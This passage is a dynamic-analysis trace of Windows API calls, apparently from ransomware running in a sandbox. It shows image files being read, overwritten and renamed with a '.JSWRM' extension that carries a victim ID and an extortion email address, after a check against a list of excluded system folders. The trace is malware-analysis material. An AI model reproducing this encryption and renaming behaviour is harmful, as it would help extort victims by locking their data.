(lpString1="PH02291U.BMP", lpString2="documents and settings") returned 1 [0094.199] lstrcmpiW (lpString1="PH02291U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0094.199] lstrcmpiW (lpString1="PH02291U.BMP", lpString2="system volume information") returned -1 [0094.200] lstrcmpiW (lpString1="PH02291U.BMP", lpString2="msocache") returned 1 [0094.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0094.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02291U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02291U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02291U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0094.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0094.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02291U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02291U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02291U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0094.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0094.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0094.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0094.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0094.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0094.200] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02291U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02291u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0094.201] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32184) returned 1 [0094.201] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7db0) returned 0x24d210 [0094.202] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7db0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7db0, lpOverlapped=0x0) returned 1 [0094.209] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.209] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7db0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7db0, lpOverlapped=0x0) returned 1 [0094.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0094.210] CloseHandle (hObject=0x314) returned 1 [0094.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0094.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0094.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0094.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0094.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0094.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0094.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0094.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0094.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0094.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0094.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0094.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0094.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0094.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0094.211] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02291U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02291u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02291U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02291u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0094.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0094.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0094.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0094.212] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1022edb4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1022edb4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1022edb4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7ce0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02398U.BMP", cAlternateFileName="")) returned 1 [0094.212] lstrcmpiW (lpString1="PH02398U.BMP", lpString2=".") returned 1 [0094.212] lstrcmpiW (lpString1="PH02398U.BMP", lpString2="..") returned 1 [0094.212] lstrcmpiW (lpString1="PH02398U.BMP", lpString2="...") returned 1 [0094.212] lstrcmpiW (lpString1="PH02398U.BMP", lpString2="windows") returned -1 [0094.212] lstrcmpiW (lpString1="PH02398U.BMP", lpString2="recovery") returned -1 [0094.212] lstrcmpiW (lpString1="PH02398U.BMP", lpString2="perflogs") returned 1 [0094.212] lstrcmpiW (lpString1="PH02398U.BMP", lpString2="documents and settings") returned 1 [0094.212] lstrcmpiW (lpString1="PH02398U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0094.212] lstrcmpiW (lpString1="PH02398U.BMP", lpString2="system volume information") returned -1 [0094.212] lstrcmpiW (lpString1="PH02398U.BMP", lpString2="msocache") returned 1 [0094.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0094.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02398U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02398U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02398U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0094.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0094.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02398U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02398U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02398U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0094.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0094.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0094.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0094.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0094.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0094.213] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02398U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02398u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0094.213] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31968) returned 1 [0094.213] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7ce0) returned 0x24d210 [0094.214] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7ce0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7ce0, lpOverlapped=0x0) returned 1 [0094.230] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.230] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7ce0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7ce0, lpOverlapped=0x0) returned 1 [0094.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0094.233] CloseHandle (hObject=0x314) returned 1 [0094.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0094.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0094.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0094.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0094.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0094.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0094.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0094.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0094.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0094.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0094.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0094.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0094.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0094.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0094.235] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02398U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02398u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02398U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02398u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0094.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0094.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0094.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0094.239] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10208b6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10208b6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1022edb4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xdd5, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02412K.JPG", cAlternateFileName="")) returned 1 [0094.239] lstrcmpiW (lpString1="PH02412K.JPG", lpString2=".") returned 1 [0094.239] lstrcmpiW (lpString1="PH02412K.JPG", lpString2="..") returned 1 [0094.239] lstrcmpiW (lpString1="PH02412K.JPG", lpString2="...") returned 1 [0094.239] lstrcmpiW (lpString1="PH02412K.JPG", lpString2="windows") returned -1 [0094.239] lstrcmpiW (lpString1="PH02412K.JPG", lpString2="recovery") returned -1 [0094.239] lstrcmpiW (lpString1="PH02412K.JPG", lpString2="perflogs") returned 1 [0094.239] lstrcmpiW (lpString1="PH02412K.JPG", lpString2="documents and settings") returned 1 [0094.240] lstrcmpiW (lpString1="PH02412K.JPG", lpString2="$RECYCLE.BIN") returned 1 [0094.240] lstrcmpiW (lpString1="PH02412K.JPG", lpString2="system volume information") returned -1 [0094.240] lstrcmpiW (lpString1="PH02412K.JPG", lpString2="msocache") returned 1 [0094.240] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0094.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02412K.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02412K.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02412K.JPG", lpUsedDefaultChar=0x0) returned 12 [0094.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0094.240] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0094.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02412K.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02412K.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02412K.JPG", lpUsedDefaultChar=0x0) returned 12 [0094.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0094.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0094.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0094.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0094.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0094.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0094.241] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02412K.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02412k.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0094.241] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3541) returned 1 [0094.241] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xdd0) returned 0x23fc98 [0094.242] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xdd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xdd0, lpOverlapped=0x0) returned 1 [0094.248] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.248] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xdd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xdd0, lpOverlapped=0x0) returned 1 [0094.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0094.249] CloseHandle (hObject=0x314) returned 1 [0094.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0094.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0094.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0094.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0094.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0094.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0094.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0094.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0094.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0094.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0094.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0094.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0094.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0094.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0094.249] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02412K.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02412k.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02412K.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02412k.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0094.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0094.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0094.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0094.250] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10208b6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10208b6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1022edb4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7ce0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02417U.BMP", cAlternateFileName="")) returned 1 [0094.250] lstrcmpiW (lpString1="PH02417U.BMP", lpString2=".") returned 1 [0094.250] lstrcmpiW (lpString1="PH02417U.BMP", lpString2="..") returned 1 [0094.250] lstrcmpiW (lpString1="PH02417U.BMP", lpString2="...") returned 1 [0094.250] lstrcmpiW (lpString1="PH02417U.BMP", lpString2="windows") returned -1 [0094.250] lstrcmpiW (lpString1="PH02417U.BMP", lpString2="recovery") returned -1 [0094.250] lstrcmpiW (lpString1="PH02417U.BMP", lpString2="perflogs") returned 1 [0094.250] lstrcmpiW (lpString1="PH02417U.BMP", lpString2="documents and settings") returned 1 [0094.251] lstrcmpiW (lpString1="PH02417U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0094.251] lstrcmpiW (lpString1="PH02417U.BMP", lpString2="system volume information") returned -1 [0094.251] lstrcmpiW (lpString1="PH02417U.BMP", lpString2="msocache") returned 1 [0094.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0094.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02417U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02417U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02417U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0094.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0094.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02417U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02417U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02417U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0094.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0094.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0094.251] WideCharToMultiByte (in: 